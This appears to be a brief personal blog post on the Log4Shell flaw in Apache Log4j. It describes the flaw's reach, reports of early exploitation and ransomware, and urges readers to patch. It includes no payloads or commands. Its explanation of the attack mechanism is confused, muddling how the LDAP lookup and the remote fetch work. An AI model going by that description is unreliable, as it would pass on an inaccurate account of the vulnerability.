The whole cybersecurity community and InfoSec community have been talking about Log4Shell since the Log4Shell news broke last Friday. Log4j is an Apache product and is a Java-based log library that has been around for over 20 years. A vulnerability called CVE-2021-44228 allows a hacker to use the LDAP protocol to interpret Log4j a log message as a URL and then send a GET request to the vulnerable server. Executable loads can then be activated within the GET request using the programming parameters ${} meaning that the hacker has full access to Remote code execution or RCE privilages and can then attack a server however he or she wishes.
Diagram showing Log4j / CVE-2021-44228 vulnerability (image credit: Juniper Threat Labs)
If many companies did not use log4j, this would be a minor issue. However, the fact that log4j has been around for so long means that hundreds of thousands of companies that store millions of records of public data including government websites and even Minecraft servers are at risk. Another big problem is that older versions of Log4j exist on many older systems and cost millions to identify and repair.
Its clear that Log4Shell is one of the biggest disasters in cybersecurity and criminals are already using it. RCE exploit has been reported to have been used for at least 9 days before the zero-day vulnerability became public and ransomware attacks linked to Log4Shell have also begun to appear. Now is the time for cybercriminals and hostile government actors to steal citizens data and try to exploit it in a criminal way. 😡😡
Please friends update your Log4j packages to the modified version and continue to lobby the companies that store your data to make sure they do their best to keep your data safe. 🙏🙏
No comments:
Post a Comment